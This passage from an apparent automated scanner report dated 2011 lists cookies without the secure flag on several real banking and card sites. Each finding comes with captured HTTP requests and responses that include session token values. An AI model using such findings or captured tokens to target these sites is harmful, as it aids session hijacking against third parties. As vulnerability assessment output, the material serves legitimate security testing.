The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cards/home.do HTTP/1.1
Host: www295.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:37 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000pVlv_8Ac9oFOFXNUhnegkUT:15bnmhi21; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 35522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "_http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<HEAD>
<meta http-equiv="X-UA-Compatible" content="IE=7" />

...[SNIP]...

10.37. https://www295.americanexpress.com/entertainmentaccess/home.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www295.americanexpress.com
Path:   /entertainmentaccess/home.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /entertainmentaccess/home.do HTTP/1.1
Host: www295.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:42 GMT
Server: IBM_HTTP_Server
Set-Cookie: ehub_JSESSIONID=0000X-wkKOi7UbYQfITKmK7Vy0B:1563unest; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 80026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>        
       
...[SNIP]...

10.38. https://www295.americanexpress.com/premium/credit-card-travel-insurance/home.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www295.americanexpress.com
Path:   /premium/credit-card-travel-insurance/home.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /premium/credit-card-travel-insurance/home.do HTTP/1.1
Host: www295.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:41 GMT
Server: IBM_HTTP_Server
Set-Cookie: fsea_JSESSIONID=0000NxGEMtoG1S-LUW_HX7nWKW2:156jli7te; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 36699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
   <head>        
       

   <meta http-equiv="expires" CONTENT="Thu, 15 Apr 2010 20
...[SNIP]...

10.39. https://www295.americanexpress.com/premium/credit-report-monitoring/enquiry.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www295.americanexpress.com
Path:   /premium/credit-report-monitoring/enquiry.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /premium/credit-report-monitoring/enquiry.do HTTP/1.1
Host: www295.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 14:08:40 GMT
Server: IBM_HTTP_Server
Location: https://www99.americanexpress.com/myca/usermgt/us/action?request_type=authreg_PPLogin&lgnsrc=PP&Face=en_US&REDIRECT_URL=https%3A%2F%2Fwww295.americanexpress.com%2Fpremium%2Fcredit-report-monitoring%2Fenquiry.do%3FSC%3DL6L%26BC%3D0003%26PC%3D0001%26lgnsrc%3DPP%26Face%3Den_US
Content-Length: 0
Set-Cookie: fsea_JSESSIONID=0000DOIuP81S4K5SAYluhZy6Q1L:156jli7te; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html
Content-Language: en-US


10.40. https://www3.citizensbankonline.com/efs/servlet/efs/default.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www3.citizensbankonline.com
Path:   /efs/servlet/efs/default.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /efs/servlet/efs/default.jsp HTTP/1.1
Host: www3.citizensbankonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000zIMvG4AcqipG-ii33a-kirx:1475b8i2o;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 15:39:33 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Content-Length: 290
Set-Cookie: JSESSIONID=0000yEc9ByzdGlyoF5hfZESfu7k:1475b8i2o; Path=/
x-wily-info: Clear guid=EC2DB056D8929D0615DE87B03E11A74E
x-wily-servlet: Encrypt1 2d/zAVDFrdY+MEWD9dZyiwAIm7vWc+o7dr8ct5rdigIfNgke0wNX4OwopA5Ho/UHpPBCo0A+u1iRytZGi/Q1CFQPEDJpVh6G8Uks8nlCt2c/qiltXkne2445BqQI6IIs
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US


                                                       <script language="JavaScript">
       location.replace("http://www.citizensbank.com");
   </script>

<noframes><body bgcolor="#FFFFFF">
...[SNIP]...

10.41. https://www3.citizensbankonline.com/efs/servlet/efs/enter-password-help.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www3.citizensbankonline.com
Path:   /efs/servlet/efs/enter-password-help.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /efs/servlet/efs/enter-password-help.jsp HTTP/1.1
Host: www3.citizensbankonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000zIMvG4AcqipG-ii33a-kirx:1475b8i2o;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 15:39:31 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Set-Cookie: JSESSIONID=00002paP1jy_NObgCyKpDHbHJ97:1475b8i2o; Path=/
x-wily-info: Clear guid=EC2DAA4FD8929D0615DE87B01E30D37A
x-wily-servlet: Encrypt1 2d/zAVDFrdY+MEWD9dZyiwAIm7vWc+o7dr8ct5rdigIfNgke0wNX4OwopA5Ho/UHpPBCo0A+u1iRytZGi/Q1CFQPEDJpVh6G8Uks8nlCt2c/qiltXkne2445BqQI6IIs
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 8526


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<title>Bank Message</title>
<style>
body {
background-color:#ffffff;
margin-left: 15px;
margin-top: 15px;

...[SNIP]...

10.42. https://www3.citizensbankonline.com/efs/servlet/efs/invalidate.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www3.citizensbankonline.com
Path:   /efs/servlet/efs/invalidate.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /efs/servlet/efs/invalidate.jsp HTTP/1.1
Host: www3.citizensbankonline.com
Connection: keep-alive
Referer: https://www3.citizensbankonline.com/efs/servlet/efs/login.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000zIMvG4AcqipG-ii33a-kirx:1475b8i2o

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 15:37:47 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Set-Cookie: JSESSIONID=0000tBooLP7LahSCClCMafF0ji2:1475b8i2o; Path=/
x-wily-info: Clear guid=EC2C1327D8929D0615DE87B0C42ABB3D
x-wily-servlet: Encrypt1 2d/zAVDFrdY+MEWD9dZyiwAIm7vWc+o7dr8ct5rdigIfNgke0wNX4OwopA5Ho/UHpPBCo0A+u1iRytZGi/Q1CFQPEDJpVh6G8Uks8nlCt2c/qiltXkne2445BqQI6IIs
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US


10.43. https://www3.citizensbankonline.com/efs/servlet/efs/login.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www3.citizensbankonline.com
Path:   /efs/servlet/efs/login.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /efs/servlet/efs/login.jsp HTTP/1.1
Host: www3.citizensbankonline.com
Connection: keep-alive
Referer: https://www3.citizensbankonline.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 15:36:01 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Set-Cookie: JSESSIONID=0000zIMvG4AcqipG-ii33a-kirx:1475b8i2o; Path=/
x-wily-info: Clear guid=EC2A761CD8929D0615DE87B0FF9A505F
x-wily-servlet: Encrypt1 2d/zAVDFrdY+MEWD9dZyiwAIm7vWc+o7dr8ct5rdigIfNgke0wNX4OwopA5Ho/UHpPBCo0A+u1iRytZGi/Q1CFQPEDJpVh6G8Uks8nlCt2c/qiltXkne2445BqQI6IIs
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 16267


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<head>
<script src="/efs/efs/jsp-ns/pm_fp.js"> </script>
<script>
<!--
function openPWWindow() {
MyWindow=
...[SNIP]...

10.44. https://www3.citizensbankonline.com/efs/servlet/efs/secure-login-help.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www3.citizensbankonline.com
Path:   /efs/servlet/efs/secure-login-help.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /efs/servlet/efs/secure-login-help.jsp HTTP/1.1
Host: www3.citizensbankonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000zIMvG4AcqipG-ii33a-kirx:1475b8i2o;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 15:39:32 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Set-Cookie: JSESSIONID=0000ii7ijhH3ZBhJL4DYlqm5l6K:1475b8i2o; Path=/
x-wily-info: Clear guid=EC2DAE08D8929D0615DE87B0B2BA8262
x-wily-servlet: Encrypt1 2d/zAVDFrdY+MEWD9dZyiwAIm7vWc+o7dr8ct5rdigIfNgke0wNX4OwopA5Ho/UHpPBCo0A+u1iRytZGi/Q1CFQPEDJpVh6G8Uks8nlCt2c/qiltXkne2445BqQI6IIs
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 8785


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<title> Bank Message</title>
<style>
body {
background-color:#ffffff;
margin-left: 15px;
margin-top: 15
...[SNIP]...

10.45. https://www3.citizensbankonline.com/efs/servlet/efs/wait.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www3.citizensbankonline.com
Path:   /efs/servlet/efs/wait.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /efs/servlet/efs/wait.jsp HTTP/1.1
Host: www3.citizensbankonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000zIMvG4AcqipG-ii33a-kirx:1475b8i2o;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 15:39:29 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Set-Cookie: JSESSIONID=0000jWQmN1NjoskCaW51LFHfStk:1475b8i2o; Path=/
x-wily-info: Clear guid=EC2DA2D9D8929D0615DE87B03C3756DD
x-wily-servlet: Encrypt1 2d/zAVDFrdY+MEWD9dZyiwAIm7vWc+o7dr8ct5rdigIfNgke0wNX4OwopA5Ho/UHpPBCo0A+u1iRytZGi/Q1CFQPEDJpVh6G8Uks8nlCt2c/qiltXkne2445BqQI6IIs
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 8729


<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

   
   <head>
   <title>Processing...</ti
...[SNIP]...

10.46. https://ad.doubleclick.net/activity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ad.doubleclick.net
Path:   /activity

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /activity;src=2549153;type=initi091;cat=landi727;ord=1;num= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: https://ad.doubleclick.net/activity;src=2549153;type=initi091;cat=landi727;ord=1;num=&_dc_ck=try
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Thu, 03 Feb 2011 13:32:53 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Thu, 03 Feb 2011 13:17:53 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


10.47. https://axptravel.americanexpress.com/consumertravel/travel.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://axptravel.americanexpress.com
Path:   /consumertravel/travel.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /consumertravel/travel.do?a=travel-offers&us_nu=subtab&inav=menu_travel_viewoffers HTTP/1.1
Host: axptravel.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:43:27 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=10.10.14.1-1296740607012467; Path=/; expires=Sun, 07-Feb-16 13:43:27 GMT; domain=.americanexpress.com, troute=w511; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/;domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000zLKMrS0j-ZgbX8l2Qda1jDt:15a6nqa6a; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Set-Cookie: NSC_nf3-x-sx-duouswm-b=ffffffff97a3d14e45525d5f4f58455e445a4a42bbfd;path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Connection: close
Set-Cookie: sroute=386796042.58404.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 76587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <title>Tr
...[SNIP]...

10.48. https://easyview.us.hsbc.com/yodlee_index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://easyview.us.hsbc.com
Path:   /yodlee_index.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /yodlee_index.html HTTP/1.1
Host: easyview.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:04:44 GMT
Vary: User-Agent
Set-Cookie: yut=172.17.12.125.48721296759884519; path=/
Last-Modified: Tue, 19 Jan 2010 08:24:12 GMT
ETag: "3a9d85-2a1b-4b556c2c"
Accept-Ranges: bytes
Content-Length: 10779
Connection: close
Content-Type: text/html

<html>
<head>
<meta name=description content="EasyView enables consumers to aggregate, manage, and access all their personal accounts - bank balances, investments, bills, email, travel reservations, s
...[SNIP]...

10.49. https://espanol.regions.com/regions/enes/24/_  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://espanol.regions.com
Path:   /regions/enes/24/_

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /regions/enes/24/_ HTTP/1.1
Host: espanol.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 03 Feb 2011 15:51:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Connection: close
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Type: text/html;charset=iso-8859-1
Content-Length: 2741

<!DOCTYPE html PUBliC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="es">
<head>

<meta http-e
...[SNIP]...

10.50. https://expresstradelc.regions.com/icc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://expresstradelc.regions.com
Path:   /icc

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /icc HTTP/1.1
Host: expresstradelc.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Content-Type: text/html
Location: http://expresstradelc.regions.com/icc/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:53:24 GMT
Set-Cookie: NSC_fyqsfttsjhiumd.sfhjpot.dpn-wjq=ffffffffaf130e8a45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:27:20 GMT;path=/
Set-Cookie: rfaft2c1=CSxElP70L060EV8r+hGkjm8kVrgA1; Domain=.regions.com; Path=/; HttpOnly
Set-Cookie: rfaft2c1_.regions.com_%2F_wlf=TlNDX2Z5cXNmdHRzamhpdW1kLnNmaGpwb3QuZHBuLXdqcV9f?eqACuPgwQKiYA4fAAbwNJxQyR+gA&; Domain=.regions.com; Expires=Wed, 01 Jan 2020 00:00:00 GMT; Path=/; HttpOnly
X-Expires-Orig: None
Cache-Control: max-age=3, must-revalidate, private
Set-Cookie: NSC_fyqsfttusbefmd.sfhjpot.dpn=ffffffffaf130d3645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:14:11 GMT;path=/;secure
Content-Length: 161

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://expresstradelc.regions.com/icc/">here</a></body>

10.51. https://feedback.live.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://feedback.live.com
Path:   /default.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.aspx?locale=en-US&productkey=wlsearchweb&P1=dsathome&P2=&P3=0&P4=NOFORM&P5=DC63BAA44C3843F38378B4BB213E0A6F&P6=Washington%2c+District+Of+Columbia&P7=Original&P8=&P9=38.9069%2f-77.0284&P10=24902&P11=&P12=&searchtype=Web+Search&optl1=1&backurl=http%3a%2f%2fwww.bing.com%3a80%2f%3fFORM%3dFEEDTU HTTP/1.1
Host: feedback.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Thu, 03 Feb 2011 13:45:05 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://feedback.discoverbing.com/default.aspx?mkt=en-us&productkey=bingweb&brand=&&locale=en-US&P1=dsathome&P2=&P3=0&P4=NOFORM&P5=DC63BAA44C3843F38378B4BB213E0A6F&P6=Washington, District Of Columbia&P7=Original&P8=&P9=38.9069/-77.0284&P10=24902&P11=&P12=&searchtype=Web Search&optl1=1&backurl=http://www.bing.com:80/?FORM=FEEDTU
Set-Cookie: takemeback=takemeback=http%3a%2f%2fwww.bing.com%3a80%2f%3fFORM%3dFEEDTU; expires=Thu, 03-Feb-2011 14:45:05 GMT; path=/
Set-Cookie: LNG=feedback.live.com=en-us; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: MSIDCookie=778b4fbd-2db4-4fa4-a996-44ac5969587d; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 522

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://feedback.discoverbing.com/default.aspx?mkt=en-us&amp;productkey=bingweb&amp;brand=&amp;&amp;locale=en-US&amp;
...[SNIP]...

10.52. https://home.americanexpress.com/home/corporations.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://home.americanexpress.com
Path:   /home/corporations.shtml

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/corporations.shtml HTTP/1.1
Host: home.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html
Expires: Thu, 03 Feb 2011 13:45:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:45:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SaneID=64.212.114.32-1296740714446790; path=/; expires=Sun, 07-Feb-16 13:45:14 GMT; domain=.americanexpress.com
Set-Cookie: bandwidthdetect=vhigh; expires=Sat, 05-Mar-2011 13:45:14 GMT; path=/; domain=.americanexpress.com
Content-Length: 58419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<TITLE>Corporate Credit Cards & Bus
...[SNIP]...

10.53. https://home.americanexpress.com/home/global_splash.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://home.americanexpress.com
Path:   /home/global_splash.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home/global_splash.html HTTP/1.1
Host: home.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 26 Nov 2010 10:10:41 GMT
Server: IBM_HTTP_Server
Content-Type: text/html
Cache-Control: no-store
Expires: Thu, 03 Feb 2011 13:45:15 GMT
Date: Thu, 03 Feb 2011 13:45:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: bandwidthdetect=vhigh; expires=Sat, 05-Mar-2011 13:45:15 GMT; path=/; domain=.americanexpress.com
Content-Length: 37032

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>American Express</TITLE><META http-equiv=Content-Type content="text/html; charset=windows-1252">
<STYLE type='text/css
...[SNIP]...

10.54. https://home.americanexpress.com/home/js/ad_login.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://home.americanexpress.com
Path:   /home/js/ad_login.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home/js/ad_login.js HTTP/1.1
Host: home.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 31 Aug 2009 21:57:24 GMT
Server: IBM_HTTP_Server
Content-Type: application/x-javascript
Expires: Thu, 03 Feb 2011 20:47:26 GMT
Date: Thu, 03 Feb 2011 14:16:14 GMT
Content-Length: 9515
Connection: close
Set-Cookie: bandwidthdetect=vhigh; expires=Sat, 05-Mar-2011 14:16:14 GMT; path=/; domain=.americanexpress.com

/** SWF Object 1.5 : Flash Player detection and embed - http://blog.deconcept.com/swfobject/
*
* SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License:
* http://www.opensource.o
...[SNIP]...

10.55. https://home.americanexpress.com/home/mt_personal.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://home.americanexpress.com
Path:   /home/mt_personal.shtml

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/mt_personal.shtml HTTP/1.1
Host: home.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html
Expires: Thu, 03 Feb 2011 13:45:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:45:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SaneID=64.212.114.32-1296740713335655; path=/; expires=Sun, 07-Feb-16 13:45:13 GMT; domain=.americanexpress.com
Set-Cookie: bandwidthdetect=vhigh; expires=Sat, 05-Mar-2011 13:45:13 GMT; path=/; domain=.americanexpress.com
Content-Length: 47928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>American Express Credit Card
...[SNIP]...

10.56. https://home.americanexpress.com/home/pz/pes_basic.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://home.americanexpress.com
Path:   /home/pz/pes_basic.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home/pz/pes_basic.js HTTP/1.1
Host: home.americanexpress.com
Accept: */*
Accept-Language: en
